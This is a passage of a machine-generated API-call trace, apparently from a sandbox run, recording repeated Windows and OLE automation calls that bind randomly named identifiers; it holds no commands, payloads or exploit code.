[0060.871] CRetailMalloc_Free () returned 0x1a060101 [0060.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5570552, cbMultiByte=6, lpWideCharStr=0x343d64, cchWideChar=7 | out: lpWideCharStr="Bj1sX") returned 6 [0060.871] ITypeComp:RemoteBind (in: This=0x87cef08, szName="Bj1sX", lHashVal=0x104846, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x57a | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x57a) returned 0x0 [0060.871] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.871] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x5570552 | out: _Dst=0x87fcc50) returned 0x0 [0060.872] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea0f5e, cbMultiByte=13, lpWideCharStr=0x343d74, cchWideChar=14 | out: lpWideCharStr="_B_var_Bj1sX") returned 13 [0060.872] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_Bj1sX", lHashVal=0x100c33, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.872] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x5570552 | out: _Dst=0x343ddc) returned 0x0 [0060.872] CRetailMalloc_Free () returned 0x7940201 [0060.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5570576, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="wuMRZYL") returned 8 [0060.873] ITypeComp:RemoteBind (in: This=0x87cef08, szName="wuMRZYL", lHashVal=0x10ed26, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x57c | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x57c) returned 0x0 [0060.873] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.873] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x8, _Src=0x5570576 | out: _Dst=0x87fcc50) returned 0x0 [0060.874] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea0f8a, cbMultiByte=15, lpWideCharStr=0x343d74, cchWideChar=16 | out: lpWideCharStr="_B_var_wuMRZYL") returned 15 [0060.874] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_wuMRZYL", lHashVal=0x10f0aa, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.874] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x5570576 | out: _Dst=0x343ddc) returned 0x0 [0060.874] CRetailMalloc_Free () returned 0x7940201 [0060.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x557059a, cbMultiByte=6, lpWideCharStr=0x343d64, cchWideChar=7 | out: lpWideCharStr="zDq6P") returned 6 [0060.875] ITypeComp:RemoteBind (in: This=0x87cef08, szName="zDq6P", lHashVal=0x10fb00, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x57e | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x57e) returned 0x0 [0060.875] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.875] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x557059a | out: _Dst=0x87fcc50) returned 0x0 [0060.875] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea0fb6, cbMultiByte=13, lpWideCharStr=0x343d74, cchWideChar=14 | out: lpWideCharStr="_B_var_zDq6P") returned 13 [0060.876] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_zDq6P", lHashVal=0x10beed, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.876] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x557059a | out: _Dst=0x343ddc) returned 0x0 [0060.876] CRetailMalloc_Free () returned 0x7940201 [0060.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55705be, cbMultiByte=9, lpWideCharStr=0x343d64, cchWideChar=10 | out: lpWideCharStr="SoaVB2jX") returned 9 [0060.877] ITypeComp:RemoteBind (in: This=0x87cef08, szName="SoaVB2jX", lHashVal=0x104db0, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x580 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x580) returned 0x0 [0060.877] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.877] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x9, _Src=0x55705be | out: _Dst=0x87fcc50) returned 0x0 [0060.877] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea0fe2, cbMultiByte=16, lpWideCharStr=0x343d74, cchWideChar=17 | out: lpWideCharStr="_B_var_SoaVB2jX") returned 16 [0060.877] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_SoaVB2jX", lHashVal=0x102539, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.878] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x9, _Src=0x55705be | out: _Dst=0x343ddc) returned 0x0 [0060.878] CRetailMalloc_Free () returned 0x7940201 [0060.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55705e6, cbMultiByte=6, lpWideCharStr=0x343d64, cchWideChar=7 | out: lpWideCharStr="dg5B9") returned 6 [0060.878] ITypeComp:RemoteBind (in: This=0x87cef08, szName="dg5B9", lHashVal=0x102dd8, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x582 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x582) returned 0x0 [0060.878] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.879] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x55705e6 | out: _Dst=0x87fcc50) returned 0x0 [0060.879] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea100e, cbMultiByte=13, lpWideCharStr=0x343d74, cchWideChar=14 | out: lpWideCharStr="_B_var_dg5B9") returned 13 [0060.879] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_dg5B9", lHashVal=0x10f204, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.879] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x55705e6 | out: _Dst=0x343ddc) returned 0x0 [0060.880] CRetailMalloc_Free () returned 0x7940201 [0060.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x557060a, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="fDZPqfh") returned 8 [0060.880] ITypeComp:RemoteBind (in: This=0x87cef08, szName="fDZPqfh", lHashVal=0x10396a, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x584 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x584) returned 0x0 [0060.880] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.880] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x8, _Src=0x557060a | out: _Dst=0x87fcc50) returned 0x0 [0060.881] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea103a, cbMultiByte=15, lpWideCharStr=0x343d74, cchWideChar=16 | out: lpWideCharStr="_B_var_fDZPqfh") returned 15 [0060.881] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_fDZPqfh", lHashVal=0x102d6d, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.881] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x557060a | out: _Dst=0x343ddc) returned 0x0 [0060.881] CRetailMalloc_Free () returned 0x7940201 [0060.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x557062e, cbMultiByte=9, lpWideCharStr=0x343d64, cchWideChar=10 | out: lpWideCharStr="hKwqjnfc") returned 9 [0060.882] ITypeComp:RemoteBind (in: This=0x87cef08, szName="hKwqjnfc", lHashVal=0x101c24, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x586 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x586) returned 0x0 [0060.882] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.882] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x9, _Src=0x557062e | out: _Dst=0x87fcc50) returned 0x0 [0060.883] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea1066, cbMultiByte=16, lpWideCharStr=0x343d74, cchWideChar=17 | out: lpWideCharStr="_B_var_hKwqjnfc") returned 16 [0060.883] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_hKwqjnfc", lHashVal=0x10f3ec, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.883] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x9, _Src=0x557062e | out: _Dst=0x343ddc) returned 0x0 [0060.883] CRetailMalloc_Free () returned 0x7940201 [0060.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5570656, cbMultiByte=6, lpWideCharStr=0x343d64, cchWideChar=7 | out: lpWideCharStr="aePAm") returned 6 [0060.884] ITypeComp:RemoteBind (in: This=0x87cef08, szName="aePAm", lHashVal=0x107d06, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x588 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x588) returned 0x0 [0060.884] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.884] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x5570656 | out: _Dst=0x87fcc50) returned 0x0 [0060.884] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea1092, cbMultiByte=13, lpWideCharStr=0x343d74, cchWideChar=14 | out: lpWideCharStr="_B_var_aePAm") returned 13 [0060.884] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_aePAm", lHashVal=0x1040f3, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.885] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x5570656 | out: _Dst=0x343ddc) returned 0x0 [0060.885] CRetailMalloc_Free () returned 0x7940201 [0060.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x557067a, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="nVx2XpQ") returned 8 [0060.886] ITypeComp:RemoteBind (in: This=0x87cef08, szName="nVx2XpQ", lHashVal=0x10994e, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x58a | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x58a) returned 0x0 [0060.886] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.886] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x8, _Src=0x557067a | out: _Dst=0x87fcc50) returned 0x0 [0060.886] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea10be, cbMultiByte=15, lpWideCharStr=0x343d74, cchWideChar=16 | out: lpWideCharStr="_B_var_nVx2XpQ") returned 15 [0060.887] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_nVx2XpQ", lHashVal=0x108d51, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.887] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x557067a | out: _Dst=0x343ddc) returned 0x0 [0060.887] CRetailMalloc_Free () returned 0x7940201 [0060.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x557069e, cbMultiByte=9, lpWideCharStr=0x343d64, cchWideChar=10 | out: lpWideCharStr="B0AQWYt9") returned 9 [0060.887] ITypeComp:RemoteBind (in: This=0x87cef08, szName="B0AQWYt9", lHashVal=0x102414, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x58c | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x58c) returned 0x0 [0060.887] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.888] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x9, _Src=0x557069e | out: _Dst=0x87fcc50) returned 0x0 [0060.888] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea10ea, cbMultiByte=16, lpWideCharStr=0x343d74, cchWideChar=17 | out: lpWideCharStr="_B_var_B0AQWYt9") returned 16 [0060.888] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_B0AQWYt9", lHashVal=0x10fbdc, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.888] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x9, _Src=0x557069e | out: _Dst=0x343ddc) returned 0x0 [0060.888] CRetailMalloc_Free () returned 0x7940201 [0060.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55706c6, cbMultiByte=9, lpWideCharStr=0x343d64, cchWideChar=10 | out: lpWideCharStr="QVyPs2YA") returned 9 [0060.889] ITypeComp:RemoteBind (in: This=0x87cef08, szName="QVyPs2YA", lHashVal=0x106fb6, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x58e | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x58e) returned 0x0 [0060.889] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.889] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x9, _Src=0x55706c6 | out: _Dst=0x87fcc50) returned 0x0 [0060.890] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea1116, cbMultiByte=16, lpWideCharStr=0x343d74, cchWideChar=17 | out: lpWideCharStr="_B_var_QVyPs2YA") returned 16 [0060.890] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_QVyPs2YA", lHashVal=0x10473f, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.890] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x9, _Src=0x55706c6 | out: _Dst=0x343ddc) returned 0x0 [0060.890] CRetailMalloc_Free () returned 0x7940201 [0060.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55706ee, cbMultiByte=9, lpWideCharStr=0x343d64, cchWideChar=10 | out: lpWideCharStr="Do5PZGSh") returned 9 [0060.891] ITypeComp:RemoteBind (in: This=0x87cef08, szName="Do5PZGSh", lHashVal=0x10e0d4, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x590 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x590) returned 0x0 [0060.891] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.891] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x9, _Src=0x55706ee | out: _Dst=0x87fcc50) returned 0x0 [0060.892] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea1142, cbMultiByte=16, lpWideCharStr=0x343d74, cchWideChar=17 | out: lpWideCharStr="_B_var_Do5PZGSh") returned 16 [0060.892] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_Do5PZGSh", lHashVal=0x10a8dc, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.892] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x9, _Src=0x55706ee | out: _Dst=0x343ddc) returned 0x0 [0060.892] CRetailMalloc_Free () returned 0x7940201 [0060.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5570716, cbMultiByte=6, lpWideCharStr=0x343d64, cchWideChar=7 | out: lpWideCharStr="tiCg8") returned 6 [0060.893] ITypeComp:RemoteBind (in: This=0x87cef08, szName="tiCg8", lHashVal=0x102343, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x592 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x592) returned 0x0 [0060.893] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.893] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x5570716 | out: _Dst=0x87fcc50) returned 0x0 [0060.893] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea116e, cbMultiByte=13, lpWideCharStr=0x343d74, cchWideChar=14 | out: lpWideCharStr="_B_var_tiCg8") returned 13 [0060.893] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_tiCg8", lHashVal=0x10e76f, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.894] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x5570716 | out: _Dst=0x343ddc) returned 0x0 [0060.894] CRetailMalloc_Free () returned 0x7940201 [0060.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x557073a, cbMultiByte=7, lpWideCharStr=0x343d64, cchWideChar=8 | out: lpWideCharStr="upBQqY") returned 7 [0060.894] ITypeComp:RemoteBind (in: This=0x87cef08, szName="upBQqY", lHashVal=0x10c688, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x594 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x594) returned 0x0 [0060.894] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.894] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x557073a | out: _Dst=0x87fcc50) returned 0x0 [0060.895] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea119a, cbMultiByte=14, lpWideCharStr=0x343d74, cchWideChar=15 | out: lpWideCharStr="_B_var_upBQqY") returned 14 [0060.895] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_upBQqY", lHashVal=0x1040f2, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.895] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x557073a | out: _Dst=0x343ddc) returned 0x0 [0060.895] CRetailMalloc_Free () returned 0x7940201 [0060.896] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x557075e, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="M2efAoQ") returned 8 [0060.896] ITypeComp:RemoteBind (in: This=0x87cef08, szName="M2efAoQ", lHashVal=0x105290, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x596 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x596) returned 0x0 [0060.896] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.896] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x8, _Src=0x557075e | out: _Dst=0x87fcc50) returned 0x0 [0060.897] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea11c6, cbMultiByte=15, lpWideCharStr=0x343d74, cchWideChar=16 | out: lpWideCharStr="_B_var_M2efAoQ") returned 15 [0060.897] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_M2efAoQ", lHashVal=0x104693, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.897] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x557075e | out: _Dst=0x343ddc) returned 0x0 [0060.897] CRetailMalloc_Free () returned 0x7940201 [0060.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5570782, cbMultiByte=6, lpWideCharStr=0x343d64, cchWideChar=7 | out: lpWideCharStr="cnkZg") returned 6 [0060.898] ITypeComp:RemoteBind (in: This=0x87cef08, szName="cnkZg", lHashVal=0x107cc7, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x598 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x598) returned 0x0 [0060.898] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.898] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x5570782 | out: _Dst=0x87fcc50) returned 0x0 [0060.899] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea11f2, cbMultiByte=13, lpWideCharStr=0x343d74, cchWideChar=14 | out: lpWideCharStr="_B_var_cnkZg") returned 13 